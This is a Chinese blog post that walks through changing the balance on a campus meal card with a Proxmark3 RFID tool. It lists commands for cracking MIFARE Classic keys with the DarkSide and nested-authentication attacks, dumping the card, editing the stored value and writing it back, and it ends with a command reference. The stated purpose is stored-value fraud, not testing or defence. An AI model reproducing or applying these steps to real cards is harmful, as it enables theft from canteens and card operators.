proxmark3之改饭卡金额

2015-10-29  本文已影响4641人  姜喃人

对于无线射频卡RFID小弟有所研究今日分享一篇关于修改饭卡金额的文章

如果对ID,IC卡还不是很了解先看看raidwar的文章把,驱动什么的请自行百度

低俗文章之傻傻分不清楚的ic和id卡

以及命令帮助

使用Proxmark3进行MIFARE Classic卡的安全测试

以及数据分析

RFID之M1卡数据分析

下面进入正题

首先

驱动装好之后可以看到设备管理器中查看 发现proxmark3使用是COM5端口

proxmark3.exe COM5

hw tune

成功后如下显示

此时讲自己的高频卡放上去然后直接使用命令

hf mf mifare

如果

找到 validkey 则直接使用命令: 

必须知道一个正确的Key方可进行相关的操作

hf mf nested 1 0 A ffffffffffff

基于验证漏洞进行全卡区域Key破解 

如果结果为

则   再次进行漏洞循环破解

hf mf mifare 524bb6a2 

直到找到正确密码为止(显示Found valid key)

找到密码后使用(测试嵌套认证漏洞,基于一个已知Key,获取都有扇区Keys)

hf mf nested 1 0 A ffffffffffff d

导出密码二进制文件,接着使用

hf mf dump

dump数据到bin文件 后分析修改数据后再次导入

使用命令以二进制方式恢复数据到空白的MIFARE classic卡

hf mf restore

完成

附录

hf mf (MIFARE卡的相关命令...)

help显示帮助

dbg设置默认调试模式

rdbl读取MIFARE classic卡的区块数据

rdsc读取MIFARE classic卡的扇区数据

dump导出MIFARE classic卡的数据到二进制文件

restore从二进制文件恢复数据到空白的MIFARE classic卡

wrbl改写MIFARE classic卡的区块数据

chk测试MIFARE classic卡的各个区块KEY A/B

mifare基于PRNG漏洞,执行mifare “DarkSide”攻击操作

nested测试嵌套认证漏洞,基于一个已知Key,获取都有扇区Keys

sniff嗅卡片与读写器之间的通讯(等同于hf 14a snoop)

sim模拟一个MIFARE卡片

eclr清除仿真内存的各区块数据

eget获取仿真内存的各区块数据

eset设置仿真内存的各区块数据

eload从导出的文件加载仿真数据

esave导出保存仿真数据到文件

ecfill利用仿真器的keys来填补仿真内存

ekeyprn打印输出仿真内存中的keys

csetuid直接设置可改UID卡的UID

csetblk把对应区块数据写入UID卡

cgetblk读取UID卡对应区块数据

cgetsc读取UID卡对应扇区数据

cload写入dump数据到UID卡。注意

csave保存UID卡数据到文件或者仿真内存

上一篇下一篇

猜你喜欢

热点阅读